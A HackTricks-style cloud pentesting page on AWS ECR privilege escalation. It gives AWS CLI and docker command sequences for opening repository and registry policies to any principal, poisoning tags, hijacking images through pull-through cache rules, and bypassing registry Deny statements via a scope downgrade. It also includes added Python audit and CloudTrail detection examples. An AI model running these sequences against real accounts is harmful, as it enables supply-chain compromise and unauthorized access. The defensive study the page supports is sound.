# AWS - ECR Privesc
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the Discord group or the telegram group or follow us on Twitter @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
## ECR
### `ecr:GetAuthorizationToken`, `ecr:BatchGetImage`
An attacker with `ecr:GetAuthorizationToken` and `ecr:BatchGetImage` can log in to ECR and download images.
For more info on how to download images:
Potential impact: Indirect privesc by intercepting sensitive information in the traffic.
### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`
An attacker with all those permissions can log in to ECR and upload images. This can be useful to escalate privileges to other environments where those images are being used.
In addition, `ecr:PutImage` can be used to overwrite an existing tag (for example `stable` / `prod`) by uploading a different image manifest under that tag, effectively hijacking tag-based deployments.
This becomes especially impactful when downstream consumers deploy by tag and auto-refresh on tag changes, such as:
- Lambda container image functions (`PackageType=Image`) referencing `.../repo:stable`
- ECS services / Kubernetes workloads pulling `repo:prod` (without digest pinning)
- Any CI/CD that redeploys on ECR events
In those cases, a tag overwrite can lead to remote code execution in the consumer environment and privilege escalation to the IAM role used by that workload (for example, a Lambda execution role with `secretsmanager:GetSecretValue`).
To learn how to upload a new image/update one, check:
### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability`, `ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload`, `ecr-public:PutImage`, `ecr-public:UploadLayerPart`
Like the previous section, but for public repositories.
### `ecr:SetRepositoryPolicy`
An attacker with this permission could change the repository policy to grant himself (or even everyone) read/write access.
For example, the following policy gives read access to everyone:
```bash
aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
```
Contents of my-policy.json:
```json
{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "allow public pull",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}
```
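From the defender's side, the thing to check for is exactly the shape of the policy above: an `Allow` statement whose `Principal` is `*` and that carries no `Condition`. The following is an added example (not code from the original page or from HackTricks) that audits a repository policy document for such statements and reports whether they permit pulling and/or pushing. It works on the policy JSON only; in practice the text comes from the `policyText` field returned by `aws ecr get-repository-policy --repository-name <repo>`. The three sample policies are constructed for the example.

```python
"""Audit an ECR repository policy for statements that open the repository to
any principal (Principal "*" without a Condition).

Added example, not part of the original page. Input is the policy JSON text
as returned in `policyText` by `aws ecr get-repository-policy`.
"""
import json
from fnmatch import fnmatchcase

# Actions that let a caller read image content, and actions that let it write.
PULL_ACTIONS = ("ecr:BatchGetImage", "ecr:GetDownloadUrlForLayer")
PUSH_ACTIONS = ("ecr:PutImage", "ecr:InitiateLayerUpload",
                "ecr:UploadLayerPart", "ecr:CompleteLayerUpload")


def _as_list(value):
    """IAM allows scalars where lists are expected; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _anyone(principal):
    """True for Principal "*" or {"AWS": "*"} (the "*" may sit inside a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any("*" in _as_list(v) for v in principal.values())
    return False


def _covers(patterns, actions):
    """IAM action names are matched as case-insensitive globs (ecr:Batch*, ecr:*, *)."""
    return any(fnmatchcase(a.lower(), p.lower()) for p in patterns for a in actions)


def find_public_grants(policy_text):
    """Return one finding per Allow statement usable by any principal without a
    Condition, recording whether it grants pull and/or push capability."""
    policy = json.loads(policy_text)
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or not _anyone(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            # Scoped by e.g. aws:PrincipalOrgID: not anonymous, review separately.
            continue
        patterns = _as_list(stmt.get("Action"))
        findings.append({
            "sid": stmt.get("Sid"),
            "pull": _covers(patterns, PULL_ACTIONS),
            "push": _covers(patterns, PUSH_ACTIONS),
        })
    return findings


# Constructed sample policies for the example.
PUBLIC_PULL_POLICY = json.dumps({
    "Version": "2008-10-17",
    "Statement": [{"Sid": "allow public pull", "Effect": "Allow", "Principal": "*",
                   "Action": ["ecr:BatchCheckLayerAvailability", "ecr:BatchGetImage",
                              "ecr:GetDownloadUrlForLayer"]}],
})
ORG_SCOPED_POLICY = json.dumps({
    "Version": "2008-10-17",
    "Statement": [{"Sid": "org pull", "Effect": "Allow", "Principal": {"AWS": "*"},
                   "Action": ["ecr:BatchGetImage", "ecr:GetDownloadUrlForLayer"],
                   "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-exampleorgid"}}}],
})
PUBLIC_WRITE_POLICY = json.dumps({
    "Version": "2008-10-17",
    "Statement": [{"Sid": "everything", "Effect": "Allow", "Principal": "*",
                   "Action": "ecr:*"}],
})

if __name__ == "__main__":
    for name, doc in [("public pull", PUBLIC_PULL_POLICY),
                      ("org scoped", ORG_SCOPED_POLICY),
                      ("public write", PUBLIC_WRITE_POLICY)]:
        print(name, find_public_grants(doc))
```

A finding with `push: True` is the case that matters most for the escalation path described on this page, since it lets anyone replace the images that downstream workloads pull.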
### `ecr-public:SetRepositoryPolicy`
Like the previous section, but for public repositories.
An attacker can modify the repository policy of an ECR Public repository to grant unauthorized public access or escalate their privileges.
```bash
# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json
# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
```
Potential impact: Unauthorized public access to the ECR Public repository, allowing anyone to push, pull or delete images.
### `ecr:PutRegistryPolicy`
An attacker with this permission can change the registry policy to grant himself, his account (or even everyone) read/write access. Unlike a repository policy, the registry policy applies to the whole private registry and is set with `put-registry-policy` (no repository name):
```bash
aws ecr put-registry-policy \
--policy-text file://my-policy.json
```
### `ecr:CreatePullThroughCacheRule`
Abuse ECR Pull Through Cache (PTC) rules to bind an attacker-controlled upstream namespace to a trusted private ECR prefix. This lets workloads that pull from the private ECR transparently receive attacker images without any push to the private ECR.
- Required perms: `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`. If an ECR Public upstream is used: `ecr-public:*` to create/push to the public repo.
- Tested upstream: public.ecr.aws
Steps (example):
- Prepare an attacker image in ECR Public. Get your ECR Public alias with: `aws ecr-public describe-registries --region us-east-1`
```bash
docker login public.ecr.aws/<public_alias>
docker build -t public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test .
docker push public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test
```
- Create the PTC rule in the private ECR to bind a trusted prefix to the public registry
```bash
aws ecr create-pull-through-cache-rule --region us-east-2 --ecr-repository-prefix ptc --upstream-registry-url public.ecr.aws
```
- Pull the attacker image via the private ECR path (no push to the private ECR was performed)
```bash
docker login <account_id>.dkr.ecr.us-east-2.amazonaws.com
docker pull <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test
docker run --rm <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test
```
Potential impact: Supply chain compromise by hijacking internal image names under the chosen prefix. Any workload that pulls images from the private ECR with that prefix will receive attacker-controlled content.
### `ecr:PutImageTagMutability`
Abuse this permission to flip a repository with tag immutability to mutable and overwrite trusted tags (e.g. `latest`, `stable`, `prod`) with attacker-controlled content.
- Required perms: `ecr:PutImageTagMutability` plus push capabilities (`ecr:GetAuthorizationToken`, `ecr:InitiateLayerUpload`, `ecr:UploadLayerPart`, `ecr:CompleteLayerUpload`, `ecr:PutImage`).
- Impact: Supply chain compromise by silently replacing immutable tags without changing tag names.
Steps (example):
<details>
<summary>Poison an immutable tag by toggling mutability</summary>

```bash
REGION=us-east-1
REPO=ht-immutable-demo-$RANDOM
aws ecr create-repository --region $REGION --repository-name $REPO --image-tag-mutability IMMUTABLE
acct=$(aws sts get-caller-identity --query Account --output text)
aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
# Build and push initial trusted tag
printf 'FROM alpine:3.19\nCMD echo V1\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
# Attempt overwrite while IMMUTABLE (should fail)
printf 'FROM alpine:3.19\nCMD echo V2\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
# Flip to MUTABLE and overwrite
aws ecr put-image-tag-mutability --region $REGION --repository-name $REPO --image-tag-mutability MUTABLE
docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
# Validate consumers pulling by tag now get the poisoned image (prints V2)
docker run --rm ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
```
</details>

### Global registry hijacking via ROOT Pull-Through Cache rule
Create a Pull-Through Cache (PTC) rule that uses the special `ecrRepositoryPrefix=ROOT` to map the root of the private ECR registry to an upstream public registry (e.g. ECR Public). Any pull of a non-existent repository in the private registry will be transparently served from upstream, enabling supply-chain hijacking without pushing to private ECR.
- Required perms: `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`, `ecr:GetAuthorizationToken`.
- Impact: Pulls of `<account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag>` succeed and automatically create private repos populated from upstream.
Note: For ROOT rules, omit `--upstream-repository-prefix`. Supplying it causes a validation error.
<details>
<summary>Demo (us-east-1, upstream public.ecr.aws)</summary>

```bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)
# 1) Create ROOT PTC rule mapping to ECR Public (no upstream prefix)
aws ecr create-pull-through-cache-rule \
--region "$REGION" \
--ecr-repository-prefix ROOT \
--upstream-registry-url public.ecr.aws
# 2) Authenticate to private ECR and pull via root path (triggers caching & auto repo creation)
aws ecr get-login-password --region "$REGION" | docker login --username AWS --password-stdin ${ACCT}.dkr.ecr.${REGION}.amazonaws.com
# Example using an official mirror path hosted in ECR Public
# (public.ecr.aws/docker/library/alpine:latest)
docker pull ${ACCT}.dkr.ecr.${REGION}.amazonaws.com/docker/library/alpine:latest
# 3) Verify repo and image now exist without any push
aws ecr describe-repositories --region "$REGION" \
--query "repositories[?repositoryName=='docker/library/alpine']"
aws ecr list-images --region "$REGION" --repository-name docker/library/alpine --filter tagStatus=TAGGED
# 4) Cleanup
aws ecr delete-pull-through-cache-rule --region "$REGION" --ecr-repository-prefix ROOT
aws ecr delete-repository --region "$REGION" --repository-name docker/library/alpine --force || true
```
</details>
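Both PTC abuses above (a prefix rule bound to an unrestricted public namespace, and a ROOT rule) leave a visible artefact in the registry configuration, so they can be audited rather than only caught at pull time. The following is an added example (not code from the original page or from HackTricks) that takes the JSON shape returned by `aws ecr describe-pull-through-cache-rules` and grades each rule: ROOT rules are critical, rules whose upstream namespace is not pinned are high, pinned namespaces not on a vetted allow-list are medium. It assumes the response fields `ecrRepositoryPrefix`, `upstreamRegistryUrl` and `upstreamRepositoryPrefix`, and that a rule created without `--upstream-repository-prefix` reports that field as absent or `ROOT`; the allow-list and the sample document are constructed for the example.

```python
"""Audit pull-through cache (PTC) rules of a private ECR registry.

Added example, not part of the original page. Input is the JSON returned by
`aws ecr describe-pull-through-cache-rules`; the field names used here are
an assumption to verify against the real response.
"""
import json

# Upstream namespaces the organisation has vetted (constructed for the example).
ALLOWED_UPSTREAM_PREFIXES = {
    ("public.ecr.aws", "docker/library"),
}

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "info": 3}


def audit_ptc_rules(describe_output, allowed=ALLOWED_UPSTREAM_PREFIXES):
    """Return (severity, ecrRepositoryPrefix, reason) findings, worst first."""
    doc = json.loads(describe_output) if isinstance(describe_output, str) else describe_output
    findings = []
    for rule in doc.get("pullThroughCacheRules", []):
        prefix = rule.get("ecrRepositoryPrefix")
        upstream = rule.get("upstreamRegistryUrl", "")
        # Assumption: a rule created without --upstream-repository-prefix reports
        # the field as absent or as the literal "ROOT" (whole upstream registry).
        up_prefix = rule.get("upstreamRepositoryPrefix")
        unrestricted = up_prefix in (None, "ROOT")
        if prefix == "ROOT":
            findings.append(("critical", prefix,
                             f"ROOT rule: any missing repository path is fetched from {upstream}"))
        elif unrestricted:
            findings.append(("high", prefix,
                             f"mirrors all of {upstream}: any upstream publisher is reachable as {prefix}/..."))
        elif (upstream, up_prefix) not in allowed:
            findings.append(("medium", prefix,
                             f"upstream namespace {upstream}/{up_prefix} is not on the allow-list"))
        else:
            findings.append(("info", prefix,
                             f"pinned to vetted namespace {upstream}/{up_prefix}"))
    findings.sort(key=lambda f: SEVERITY_ORDER[f[0]])
    return findings


def remediation_commands(findings, region):
    """CLI commands that remove the critical and high findings (the same
    delete-pull-through-cache-rule call the demo above uses for cleanup)."""
    return [
        f"aws ecr delete-pull-through-cache-rule --region {region} --ecr-repository-prefix {prefix}"
        for severity, prefix, _ in findings if severity in ("critical", "high")
    ]


# Constructed sample response for the example.
SAMPLE_DESCRIBE_OUTPUT = json.dumps({
    "pullThroughCacheRules": [
        {"ecrRepositoryPrefix": "base", "upstreamRegistryUrl": "public.ecr.aws",
         "upstreamRepositoryPrefix": "docker/library"},
        {"ecrRepositoryPrefix": "ptc", "upstreamRegistryUrl": "public.ecr.aws"},
        {"ecrRepositoryPrefix": "ROOT", "upstreamRegistryUrl": "public.ecr.aws"},
        {"ecrRepositoryPrefix": "quay", "upstreamRegistryUrl": "quay.io",
         "upstreamRepositoryPrefix": "someorg/app"},
    ]
})

if __name__ == "__main__":
    found = audit_ptc_rules(SAMPLE_DESCRIBE_OUTPUT)
    for severity, prefix, reason in found:
        print(f"[{severity}] {prefix}: {reason}")
    for cmd in remediation_commands(found, "us-east-1"):
        print(cmd)
```

Running the audit on a schedule (or from a CloudTrail-triggered function on `CreatePullThroughCacheRule`) catches the rule before a workload pulls through it; the `info` entries document which upstream namespaces are intentionally mirrored.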
### `ecr:PutAccountSetting` (Downgrade `REGISTRY_POLICY_SCOPE` to bypass registry policy denies)
Abuse `ecr:PutAccountSetting` to switch the registry policy scope from `V2` (policy applied to all ECR actions) to `V1` (policy applied only to `CreateRepository`, `ReplicateImage`, `BatchImportUpstreamImage`). If a restrictive registry policy Deny blocks actions such as `CreatePullThroughCacheRule`, downgrading to `V1` removes that enforcement so that identity-policy Allows take effect.
- Required perms: `ecr:PutAccountSetting`, `ecr:PutRegistryPolicy`, `ecr:GetRegistryPolicy`, `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`.
- Impact: Ability to perform ECR actions previously blocked by a registry policy Deny (e.g. creating PTC rules) by temporarily setting the scope to `V1`.
Steps (example):
<details>
<summary>Bypass registry policy Deny on CreatePullThroughCacheRule by switching to V1</summary>
```bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)
# 0) Snapshot current scope/policy (for restore)
aws ecr get-account-setting --name REGISTRY_POLICY_SCOPE --region $REGION || true
aws ecr get-registry-policy --region $REGION > /tmp/orig-registry-policy.json 2>/dev/null || echo '{}' > /tmp/orig-registry-policy.json
# 1) Ensure V2 and set a registry policy Deny for CreatePullThroughCacheRule
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
cat > /tmp/deny-ptc.json <<'JSON'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenyPTCAll",
"Effect": "Deny",
"Principal": "*",
"Action": ["ecr:CreatePullThroughCacheRule"],
"Resource": "*"
}
]
}
JSON
aws ecr put-registry-policy --policy-text file:///tmp/deny-ptc.json --region $REGION
# 2) Attempt to create a PTC rule (should FAIL under V2 due to Deny)
set +e
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws
RC=$?
set -e
if [ "$RC" -eq 0 ]; then echo "UNEXPECTED: rule creation succeeded under V2 deny"; fi
# 3) Downgrade scope to V1 and retry (should SUCCEED now)
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V1 --region $REGION
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws
# 4) Verify rule exists
aws ecr describe-pull-through-cache-rules --region $REGION \
--query "pullThroughCacheRules[?ecrRepositoryPrefix=='ptc-deny-test']"
# 5) Cleanup and restore
aws ecr delete-pull-through-cache-rule --region $REGION --ecr-repository-prefix ptc-deny-test || true
if jq -e '.registryPolicyText' /tmp/orig-registry-policy.json >/dev/null 2>&1; then
jq -r '.registryPolicyText' /tmp/orig-registry-policy.json > /tmp/_orig.txt
aws ecr put-registry-policy --region $REGION --policy-text file:///tmp/_orig.txt
else
aws ecr delete-registry-policy --region $REGION || true
fi
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
```
</details>
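Every primitive on this page is a single control-plane API call that CloudTrail records, so the practical defensive counterpart is a detection rule over those events. The following is an added example (not code from the original page or from HackTricks) that classifies CloudTrail-style records for the ECR actions discussed above: a repository or registry policy that grants access to any principal, tag immutability switched to `MUTABLE`, a new pull-through cache rule (ROOT rules rated critical), the `REGISTRY_POLICY_SCOPE` downgrade to `V1`, and a `PutImage` that re-pushes a protected tag. The sample events are constructed, and their `requestParameters` keys follow the ECR API request field names, which is an assumption to verify against real CloudTrail records.

```python
"""Detection logic for the ECR privilege-escalation primitives on this page,
run over CloudTrail-style events.

Added example, not part of the original page. Sample events are constructed;
requestParameters key names mirror the ECR API request fields (assumption).
"""
import json

# Tags that downstream consumers deploy by name (constructed for the example).
PROTECTED_TAGS = {"prod", "stable", "latest", "release"}
ECR_SOURCES = {"ecr.amazonaws.com", "ecr-public.amazonaws.com"}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _wildcard_principal(policy_text):
    """True if any Allow statement in the policy text names Principal "*"."""
    try:
        policy = json.loads(policy_text)
    except (TypeError, ValueError):
        return False
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        if principal == "*":
            return True
        if isinstance(principal, dict) and any("*" in _as_list(v) for v in principal.values()):
            return True
    return False


def classify_event(event):
    """Return (severity, reason) for a suspicious ECR event, else None."""
    if event.get("eventSource") not in ECR_SOURCES:
        return None
    name = event.get("eventName", "")
    params = event.get("requestParameters") or {}
    repo = params.get("repositoryName")
    if name in ("SetRepositoryPolicy", "PutRegistryPolicy"):
        if _wildcard_principal(params.get("policyText")):
            return ("critical", f"{name} grants access to any principal")
        return ("medium", f"{name} changed a policy; review the new document")
    if name == "PutImageTagMutability" and params.get("imageTagMutability") == "MUTABLE":
        return ("high", f"tag immutability disabled on {repo}")
    if name == "CreatePullThroughCacheRule":
        prefix, upstream = params.get("ecrRepositoryPrefix"), params.get("upstreamRegistryUrl")
        if prefix == "ROOT":
            return ("critical", f"ROOT pull-through cache rule maps the whole registry to {upstream}")
        return ("high", f"new pull-through cache rule {prefix} -> {upstream}")
    if (name == "PutAccountSetting" and params.get("name") == "REGISTRY_POLICY_SCOPE"
            and params.get("value") == "V1"):
        return ("critical", "registry policy scope downgraded to V1 (registry Denies no longer apply)")
    if name == "PutImage" and params.get("imageTag") in PROTECTED_TAGS:
        return ("high", f"protected tag {params.get('imageTag')} re-pushed in {repo}")
    return None


def scan(events):
    """Return (eventName, severity, reason) for every event that classifies."""
    results = []
    for event in events:
        verdict = classify_event(event)
        if verdict is not None:
            results.append((event["eventName"],) + verdict)
    return results


# Constructed sample events (only the fields the detector reads).
SAMPLE_EVENTS = [
    {"eventSource": "ecr.amazonaws.com", "eventName": "SetRepositoryPolicy",
     "requestParameters": {"repositoryName": "app", "policyText": json.dumps({
         "Version": "2008-10-17",
         "Statement": [{"Effect": "Allow", "Principal": "*", "Action": ["ecr:BatchGetImage"]}]})}},
    {"eventSource": "ecr.amazonaws.com", "eventName": "PutImageTagMutability",
     "requestParameters": {"repositoryName": "app", "imageTagMutability": "MUTABLE"}},
    {"eventSource": "ecr.amazonaws.com", "eventName": "CreatePullThroughCacheRule",
     "requestParameters": {"ecrRepositoryPrefix": "ROOT", "upstreamRegistryUrl": "public.ecr.aws"}},
    {"eventSource": "ecr.amazonaws.com", "eventName": "PutAccountSetting",
     "requestParameters": {"name": "REGISTRY_POLICY_SCOPE", "value": "V1"}},
    {"eventSource": "ecr.amazonaws.com", "eventName": "PutImage",
     "requestParameters": {"repositoryName": "app", "imageTag": "prod"}},
    {"eventSource": "ecr.amazonaws.com", "eventName": "DescribeRepositories",
     "requestParameters": {}},
]

if __name__ == "__main__":
    for event_name, severity, reason in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {event_name}: {reason}")
```

`PutImage` on a protected tag is rated high rather than critical because legitimate releases produce the same event; correlating it with the identity that made the call and with a preceding `PutImageTagMutability` on the same repository separates a release from the tag-poisoning sequence shown above.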